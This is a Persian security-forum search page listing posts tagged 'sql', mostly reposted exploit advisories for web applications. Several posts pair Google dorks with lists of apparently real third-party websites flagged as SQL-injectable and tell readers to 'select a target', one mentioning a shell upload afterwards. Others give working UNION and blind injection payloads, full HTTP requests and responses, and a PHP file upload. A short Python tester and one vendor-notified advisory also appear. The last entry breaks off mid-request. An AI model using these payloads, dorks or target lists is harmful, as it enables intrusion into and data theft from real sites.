رفتن به مطلب



iran rules jazbe modir
ADS mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'sql'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


انجمن آموزش امنیت و راه های مقابله با نفوذ

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
  • بخش ویژه (مخصوص اعضای ویژه)
  • پروژه های تیم
  • مسابقات
  • عمومی
  • بحث آزاد علمی
  • بخش دریافت
  • آرشیو

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

338 نتیجه پیدا شد

  1. |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] title : مدعوم من معين بالة www.sampress.net sql injection |[+] author : AnonySec |[+] our web : www.anonysec.org |[+] dork : intext:مدعوم من معين بالة inurl:"php id=" |[+] tasted on : Kali Linux , Windows 10 |[+] Vulnerability Version : 5.2.2 |[+] vendor home page : www.sampress.net |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] search the google dork ==> intext:مدعوم من معين بالة inurl:"php id=" |[+] select a target |[+] inject sql codes.... |[+] demo : http://www.sampress.net/portal/print.php?id=27239' (sql injection) https://www.shabkh.com/view1thread.php?id=48929&selp=1' (sql injection) http://www.shabkh.com/view1thread.php?id=46577' (sql injection) http://www.amranpress.net/addcomments.php?id=9' (sql injection) http://solutionsproj.net/link.php?id=109' (sql injection) |[+] Discovered by ==> Moeein Seven | www.moeein.ir |[+] tnx ==> ReZa Cloner , Sheikh Shahin , Milad Shadow , RedNofozi and all bax from anonysec team.... http://www.exploit4arab.org/exploits/2228
  2. |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] title : ev zlx12p manual www.electrovoice.com sql injection |[+] dork : ev zlx12p manual php id= |[+] version : 5.2.2 |[+] risk : high |[+] tasted on : Kali Linux , Windows 10 |[+] Author : AnonySec |[+] our web : www.anonysec.org |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] search the google dork ==> ev zlx12p manual php id= |[+] select a target |[+] inject sql codes.... |[+] demo : https://www.electrovoice.com/product.php?id=2583' https://www.americanmusical.com/Item--i-ELE-ZLX112P-LIST/php?id=12' https://www.sweetwater.com/store/detail/ZLX12p--electro-voice-zlx-12p-1000w-12-inch-powered-speaker/php?id=122' https://www.bavasmusic.com.au/electrovoice-ev-zlx12p-active-powered-speaker-1000/php?id=32' |[+] Discovered by ==> Moeein Seven | www.moeein.ir |[+] tnx ==> ReZa CloNer , Sheikh Shahin , Rednofozi , Milad Shadow and all bax from anonysec team.... http://www.exploit4arab.org/exploits/2221
  3. [+] title : Powered by Invision Community www.cymiz.com sql injection |[+] dork : intext: Powered by Invision Community inurl:"php id=" |[+] vendor : www.cymiz.com |[+] author : AnonySec |[+] our web : www.anonysec.org |[+] risk : high |[+] Tasted on : Windows 10 , Kali Linux |[+] Vulnerability Version : 5.4.2 |[+] CWEs : CWE-89 |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |||Description||| With this exploit you can access the forums that use IPS script from Invision Community!! At the end you can upload shell.php or deface.html ,..... |[+] search the google dork ==> intext: Powered by Invision Community inurl:"php id=" |[+] select a target |[+] inject sql codes |[+] demo : http://link.streng.ro/click.php?id=2728' (sql injection) http://cymiz.com/forum/single.php?id=2113' (sql injection) http://acheronian-clan.de/html/treffen/t5book/index.php?id=59' (sql injection) http://proyectoscemer.morelos.gob.mx/anteproyectos_drupal.php?id=1457' (sql injection) http://www.thaihomemaster.com/webboard-readtopic.php?id=151' (sql injection) |[+] Discovered by ==> Moeein Seven | www.moeein.ir |[+] tnx==> ReZa Cloner , RedNofozi , SheikhShahin , Milad Shadow and all bax from anonysec team.... باسلام خدمت دوستان عزیز این اکسپلویت که به تازگی نوشته و ثبت شده مربوط به سیستم انجمن ساز ips نسخه 3 و 2 است که هنوز هم با وجود انتشار شدن نسخه ی 4.2.3 باز هم عده ای از این دو ورژن قدیمی و اسیب پذیر استفاده میکنند این سیستم دارای باگ sql injection است که به تازگی کشف شده پس ازش لذت ببرید :)))) موفق باشید http://www.exploit4arab.org/exploits/2208
  4. Code Widgets DataBound Collapsible Menu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/CS0077/main.asp?key=[sqli] https://www.exploit-db.com/exploits/36065/
  5. # Exploit Title:Designed by TopDesign SQL injection Vulnerability [+] # Google Dork:"Designed by Top-Design" ?id= site:tw [+] # Author: Inj3ct0r [+] # Vendor Homepage :http://pradeephagarwal.com [+] # Team: https://anonysec.org [+] # Tested on: Kali Linux and win [+] برای دیدن کل اکسپلوت به لینک ارجاع کنید https://cxsecurity.com/issue/WLB-2018100093
  6. |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] title : Copyright AT-Marine Oy - Sql Injection |[+] author : AnonySec |[+] Team : www.anonysec.org |[+] dork : intext:Copyright AT-Marine Oy inurl:"php id=" |[+] tested on : Linux , Windows 10 |[+] Version : 5.2.2 |[+] risk : high |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] search the google dork => intext:Copyright AT-Marine Oy inurl:"php id=" |[+] select a target |[+] inject sql codes |[+] demo : http://www.atmarine.fi/index.php?id=2' (sql injection) http://www.thunder-and-lightnings.co.uk/lightning/survivor.php?id=7' (sql injection) http://korea-report.org/go_out.php?id=2258' (sql injection) http://www.newsanimo.com/ztlmmxn/xhcpyvy.php?dsibnmucf=shop.php-id=1' (sql injection) http://sermirskekomando.thosting.cz/ukazfoto.php?id=108' (sql injection) |[+] Discovered by ==> Moeein Seven | www.moeein.ir |[+] tnx ==> ReZa CloNer , Sheikh Shahin , Milad Shadow and all bax from anonysec team http://www.exploit4arab.org/exploits/2203
  7. arman

    Programming-Py اموزش نوشتن sql tester

    سلام دوستان میخوایم امروز با پایتون یک برنامه بسازیم که به ما بگه سایت باگ sql داره یا نه کد : import requests url = input("Enter Your Website : ") url = url + "%27" test = requests.get(url) test = test.text if 'You have an error in your SQL syntax' in test: print("ok") else: print("no") دوستان من خیلی خیلی مختصر و مفید نوشتم شما میتونید خیلی بهترش کنید
  8. # Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection # Date: 2018-09-09 # Exploit Author: Ceylan Bozogullarindan # Vendor Homepage: http://modalsurvey.pantherius.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip # Version: 1.5.7.3 # Tested on: Windows 10 # CVE: N\A # Description # The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter. # PoC # Step 1. When you visit a page which has a poll or survey, a question will be appeared for answering. # Answer that question. # Step 2. When you answer the question, wp_sap will be assigned to a value. Open a cookie manager, # and change it with the payload showed below; ["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] # It is important that the "OR" statement must be 1=2. Because, application is reflecting the first result # of the query. When you make it 1=1, you should see a question from firt record. # Therefore OR statement must be returned False. # Step 3. Reload the page. Open the source code of the page. Search "sss_params". # You will see the version of DB in value of sss_params parameter. # The Request Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] Connection: keep-alive Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 # The result from source code of the page <script type='text/javascript'> /* <![CDATA[ */ var sss_params = {"survey_options":"{\"options\":\"[\\\"center\\\",\\\"easeInOutBack\\\",\\\"\\\",\\\"-webkit-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-moz-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-ms-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-o-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);\\\",\\\"rgb(0, 0, 0)\\\",\\\"rgb(93, 93, 93)\\\",\\\"1\\\",\\\"5\\\",\\\"12\\\",\\\"10\\\",\\\"12\\\",500,\\\"Thank you for your feedback!\\\",\\\"0\\\",\\\"0\\\",\\\"0\\\"]\",\"plugin_url\":\"http:\\\/\\\/www.*****.com\\\/wp-content\\\/plugins\\\/wp-survey-and-poll\",\"admin_url\":\"http:\\\/\\\/www.******.com\\\/wp-admin\\\/admin-ajax.php\",\"survey_id\":\"1101225978\",\"style\":\"modal\",\"expired\":\"false\",\"debug\":\"true\",\"questions\":[[\"Are You A First Time Home Buyer?\",\"Yes\",\"No\"],[\>>>>>>"10.1.36-MariaDB-1~trusty\"<<<<<<<]]}"}; /* ]]> */ </script> DB version: "10.1.36-MariaDB-1~trusty"....
  9. Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Arigato Autoresponder and Newsletter v2.5 Author: Larry W. Cashdollar, @_larry0 Date: 2018-08-22 CVE-IDs:[CVE-2018-1002000][CVE-2018-1002001][CVE-2018-1002002][CVE-2018-1002003][CVE-2018-1002004][CVE-2018-1002005][CVE-2018-1002006][CVE-2018-1002007][CVE-2018-1002008][CVE-2018-1002009] Download Site: https://wordpress.org/plugins/bft-autoresponder/ Vendor: Kiboko Labs https://calendarscripts.info/ Vendor Notified: 2018-08-22, Fixed v2.5.1.5 Vendor Contact: @prasunsen wordpress.org Advisory: http://www.vapidlabs.com/advisory.php?v=203 Description: This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule unlimited number of email messages. Messages can be sent on defined number of days after user registration, or on a fixed date. Vulnerability: These vulnerabilities require administrative priveledges to exploit. CVE-2018-1002000 There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request. In line 69 of file controllers/list.php: 65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")"); del_ids is not sanitized properly. Nine Reflected XSS. CVE-2018-1002001 In line 22-23 of controllers/list.php: 22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob']; 23 echo "<meta http-equiv='refresh' content='0;url=$url' />"; CVE-2018-1002002 bft_list.html.php:28: <div><label><?php _e('Filter by email', 'broadfast')?>:</label> <input type="text" name="filter_email" value="<?php echo @$_GET['filter_email']?>"></div> CVE-2018-1002003 bft_list.html.php:29: <div><label><?php _e('Filter by name', 'broadfast')?>:</label> <input type="text" name="filter_name" value="<?php echo @$_GET['filter_name']?>"></div> CVE-2018-1002004 bft_list.html.php:42: <input type="text" class="bftDatePicker" name="sdate" id="bftSignupDate" value="<?php echo empty($_GET['sdate']) ? '' : $_GET['sdate']?>"> CVE-2018-1002005 bft_list.html.php:43: <input type="hidden" name="filter_signup_date" value="<?php echo empty($_GET['filter_signup_date']) ? '' : $_GET['filter_signup_date']?>" id="alt_bftSignupDate"></div> CVE-2018-1002006 integration-contact-form.html.php:14: <p><label><?php _e('CSS classes (optional):', 'broadfast')?></label> <input type="text" name="classes" value="<?php echo @$_POST['classes']?>"></p> CVE-2018-1002007 integration-contact-form.html.php:15: <p><label><?php _e('HTML ID (optional):', 'broadfast')?></label> <input type="text" name="html_id" value="<?php echo @$_POST['html_id']?>"></p> CVE-2018-1002008 list-user.html.php:4: <p><a href="admin.php?page=bft_list&ob=<?php echo $_GET['ob']?>&offset=<?php echo $_GET['offset']?>"><?php _e('Back to all subscribers', 'broadfast');?></a></p> CVE-2018-1002009 unsubscribe.html.php:3: <p><input type="text" name="email" value="<?php echo @$_GET['email']?>"></p> Exploit Code: SQL Injection CVE-2018-1002000 $ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql Where post_data is: POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1 Host: example.com Connection: keep-alive Content-Length: 150 Cache-Control: max-age=0 Origin: http://example.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http] (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests: --- Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http] --- [11:50:08] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 8.0 (jessie) web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.12 [11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47' [*] shutting down at 11:50:08 CVE-2018-1002001 http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS
  10. # Exploit Title: Simple Chat System 1.0 - 'id' SQL Injection # Dork: N/A # Date: 2018-10-24 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.sourcecodester.com/php/11610/simple-chat-system.html # Software Link: https://sourceforge.net/projects/simple-chat-system/files/latest/download # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/user/chatroom.php?id=[SQL] # # [PATH]/user/chatroom.php # 03 <?php # 04 $id=$_REQUEST['id']; # 05 # 06 $chatq=mysqli_query($conn,"select * from chatroom where chatroomid='$id'"); # 07 $chatrow=mysqli_fetch_array($chatq); GET /[PATH]/user/chatroom.php?id=-3%27雷�穑ɏ볯纵듧纹럫庞%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+ HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml왩,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=fuobifeugni2gnt2kir6patce6 Connection: keep-alive HTTP/1.1 200 OK Date: Wed, 24 Oct 2018 20:44:14 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
  11. # Exploit Title: Vishesh Auto Index 3.1 - 'fid' SQL Injection # Dork: N/A # Date: 2018-10-15 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://www.vishesh.cf/ # Software Link: https://sourceforge.net/projects/vishesh-wap-auto-index/files/latest/download # Version: 3.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://192.168.1.27/[PATH]/file.php?fid=[SQL] -1%20UnioN%20seLECt%20112115%2c112115%2c112115%2c112115%2c112115%2c112115%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c112115%2c112115%2c112115%2c112115%2c112115%2c112115%2d%2d%20Efe GET /[PATH]/file.php?fid=-1%20UnioN%20seLECt%20112115%2c112115%2c112115%2c112115%2c112115%2c112115%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c112115%2c112115%2c112115%2c112115%2c112115%2c112115%2d%2d%20Efe HTTP/1.1 Host: 192.168.1.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=nk7b5obkruk2rtd2kbm3gamg42 Connection: keep-alive HTTP/1.1 200 OK Date: Sat, 15 Oct 2018 01:12:23 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 7799 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://192.168.1.27/[PATH]/download.php?fid[SQL] -1%20UnioN%20select%20ConcAT((SElecT%20GrouP_ConcAT(schema_nAME%20SEPAratoR%200x3c62723e)%20FRom%20INFORmatION_ScheMA.SchematA))%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2d%2d%20Efe GET /[PATH]/download.php?fid=-1%20UnioN%20select%20ConcAT((SElecT%20GrouP_ConcAT(schema_nAME%20SEPAratoR%200x3c62723e)%20FRom%20INFORmatION_ScheMA.SchematA))%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2d%2d%20Efe HTTP/1.1 Host: 192.168.1.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=nk7b5obkruk2rtd2kbm3gamg42 Connection: keep-alive HTTP/1.1 200 OK Date: Sat, 15 Oct 2018 01:18:41 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 835 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  12. # Exploit Title: MySQL Edit Table 1.0 - 'id' SQL Injection # Dork: N/A # Date: 2018-10-18 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.bookman.nl # Software Link: https://sourceforge.net/projects/sql-edit-table/files/latest/download # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/example.php?mte_a=edit&id=[SQL] # function edit_rec() { # if (isset ($_GET['id'])) $in_id = $_GET['id']; # if ($_GET['mte_a'] == 'edit') $edit=1; # else $edit = 0; # $count_required = 0; # $rows = ''; # $result = mysqli_query($this->mysqli,"SHOW COLUMNS FROM `$this->table`"); GET /[PATH]/example.php?mte_a=edit&id=-18++UNIon(SEleCT+0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e)--+- HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7 DNT: 1 Connection: keep-alive Upgrade-Insecure-Requests: 1 If-Modified-Since: Thu, 18 Oct 2018 14:31:03 GMT HTTP/1.1 200 OK Date: Thu, 18 Oct 2018 14:34:58 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: private Pragma: no-cache Last-Modified: Thu, 18 Oct 2018 14:34:58 GMT Content-Length: 3642 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/example.php?mte_a=del&id=[SQL] # # function del_rec() { # $in_id = $_GET['id']; # if (mysqli_query($this->mysqli,"DELETE FROM $this->table WHERE `$this->primary_key` = '$in_id'")) { # $this->content_deleted = " GET /[PATH]/example.php?mte_a=del&id=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%31%31%31%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%31%3d%31%31%31%2c%31%29%29%29%29%29%2d%2d%20%45%66%65 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7 DNT: 1 Connection: keep-alive Upgrade-Insecure-Requests: 1 If-Modified-Since: Thu, 18 Oct 2018 14:38:14 GMT HTTP/1.1 200 OK Date: Thu, 18 Oct 2018 14:38:18 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: private Pragma: no-cache Last-Modified: Thu, 18 Oct 2018 14:38:18 GMT Content-Length: 1046 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  13. # Exploit Title: Delta Sql 1.8.2 - Arbitrary File Upload # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://deltasql.sourceforge.net/ # Software Link: https://sourceforge.net/projects/deltasql/files/latest/download # Software Link: http://deltasql.sourceforge.net/deltasql/ # Version: 1.8.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/docs_manage.php?id=1 # # http://localhost/[PATH]/upload/[FILE] POST /[PATH]/docs_upload.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/[PATH]/docs_manage.php?id=1 Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0 Connection: keep-alive Content-Type: multipart/form-data; boundary= ---------------------------158943328914318561992147220435 Content-Length: 721 -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="fileToUpload"; filename="Efe.php" Content-Type: application/force-download <?php phpinfo(); ?> -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="submit" Upload File -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="id" 1 -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="version" -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="hasdocs" -----------------------------158943328914318561992147220435-- HTTP/1.1 200 OK Date: Thu, 24 Oct 2018 00:24:27 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 1783 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <html> <body> <form action="http://localhost/[PATH]/docs_upload.php" method="post" enctype="multipart/form-data"> Select document to upload: <input name="fileToUpload" id="fileToUpload" type="file"> <input value="Ver Ayari" name="submit" type="submit"> <input value="1" name="id" type="hidden"> <input value="1'" name="version" type="hidden"> <input value="1" name="hasdocs" type="hidden"> </form> </body> </html>
  14. Exploit Title: Delta Sql 1.8.2 - 'id' SQL Injection # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://deltasql.sourceforge.net/ # Software Link: https://sourceforge.net/projects/deltasql/files/latest/download # Software Link: http://deltasql.sourceforge.net/deltasql/ # Version: 1.8.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/docs_manage.php?id=[SQL]&version=1&hasdocs=1 GET /[PATH]/docs_manage.php?id=1++uNiOn+seleCt+0x31,0x32,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),0x34,0x35--+-&version=1&hasdocs=1 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: 